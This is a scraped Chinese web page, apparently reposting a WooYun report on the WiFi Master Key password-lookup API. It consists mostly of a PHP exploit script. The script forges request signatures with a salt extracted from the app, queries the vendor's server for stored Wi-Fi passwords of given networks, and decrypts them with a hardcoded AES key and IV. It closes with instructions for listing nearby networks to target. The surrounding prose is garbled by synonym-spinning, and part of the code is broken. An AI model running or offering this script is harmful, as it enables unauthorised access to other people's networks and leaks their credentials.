|
|
|
联系客服020-83701501

WIFI万能钥匙密码查询接口

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
WIFI万能钥匙暗码查问接口

拜读了《WIFI万能钥匙暗码查问接口算法破解(可无量查问用户AP明文暗码)》http://www.wooyun.org/bugs/wooyun-2015-099268一文

通过步调包解析算法(说一下在,各种key,salt明文存储,连混淆哪怕是字符拼接都没有。。。)

这 个是查问暗码用到的数据包,以及参数中sign(签名)的算法,其实即是这些数据截止排序后用salt算个md5。新版本的万能钥匙另有个retSn,实 现链式认证,也能冲破,但这个报告只说1.x版本的API题目(1.x期间很多细节领会打听没有考虑美满,基本只靠sign做安全)

Default
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899 <?php//some code from http://www.wooyun.org/bugs/wooyun-2015-099268$bssid = "c8:3a:35:fa:b8:80";$ssid = "Podinns2F03"; if(isset($bssid) && isset($ssid)){//update salt    $ret = request($bssid, $ssid, md5(rand(1, 10000)));    $ret = json_decode($ret);     $ret = request($bssid, $ssid, $ret->retSn);    $ret = json_decode($ret);    if($ret->retCd == 0){        if($ret->qryapwd->retCd == 0){            $list = $ret->qryapwd->psws;            foreach($list as $wifi){                echo 'SSID: '.$wifi->ssid."\n";                echo 'PWD: '.decryptStrin($wifi->pwd)."\n";                echo 'BSSID: '.$wifi->bssid."\n";                if($wifi->xUser){                    echo 'xUser: '.$wifi->xUser."\n";                    echo 'xPwd: '.$wifi->xPwd."\n";                }            }        }        else{            echo $ret->qryapwd->retMsg;        }    }}function request($bssid, $ssid, $salt, $dhid = 'ff8080814cc5798a014ccbbdfa375369'){    $data = array();    $data['appid'] = '0008';    $data['bssid'] = $bssid;    $data['chanid'] = 'gw';    $data['dhid'] = $dhid;    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';    $data['lang'] = 'cn';    $data['mac'] = '60f81dad28de';    $data['method'] = 'getDeepSecChkSwitch';    $data['pid'] = 'qryapwd:commonswitch';    $data['ssid'] = $ssid;    $data['st'] = 'm';    $data['uhid'] = 'a0000000000000000000000000000001';    $data['v'] = '324';    $data['sign'] = sign($data, $salt);     $curl = curl_init();    curl_setopt($curl, CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd');    curl_setopt($curl, CURLOPT_USERAGENT,'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))');    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);     curl_setopt($curl, CURLOPT_POST, true); // enable posting    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($data)); // post images     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload    $r = curl_exec($curl);     curl_close($curl);    return $r;} function registerNewDevice(){    $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$';     $data = array();    $data['appid'] = '0008';    $data['bssid'] = $bssid;    $data['chanid'] = 'gw';    $data['dhid'] = $dhid;    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';    $data['lang'] = 'cn';    $data['mac'] = '60f81dad28de';    $data['method'] = 'getDeepSecChkSwitch';    $data['pid'] = 'qryapwd:commonswitch';    $data['ssid'] = $ssid;    $data['st'] = 'm';    $data['uhid'] = 'a0000000000000000000000000000001';    $data['v'] = '324';    $data['sign'] = sign($data, $salt);} function sign( $array , $salt ){    // 签名算法    $request_str = '';    // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort     ksort( $array );    foreach ($array as $key => $value) {        $request_str .= $value;    }    $sign = md5( $request_str . $salt );    return strtoupper($sign);} function decryptStrin($str,$keys='k%7Ve#8Ie!5Fb&8E',$iv='y!0Oe#2Wj#6Pw!3V',$cipher_alg=MCRYPT_RIJNDAEL_128){    //Wi-Fi万能钥匙暗码采纳 AES/CBC/NoPadding 法子加密    //[length][password][timestamp]    $decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack("H*",$str),MCRYPT_MODE_CBC, $iv);    return substr(trim($decrypted_string),3,-13);}?>

说明:如何检查附近的WIFI

powershell能够cmd实验netsh wlan show network mode=bssid,将后果粘贴进去

air用户则

实验airport -s,将后果粘贴进去
假定揭示没有airport,先实验

Default
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport

Default
/usr/sbin/airport

我们qu查问huipu那个~

【via@Internet转载】 本文不晓得作者身份,请作者看到文章后在文末留下留下法子,谢谢!

数安新闻+更多

证书相关+更多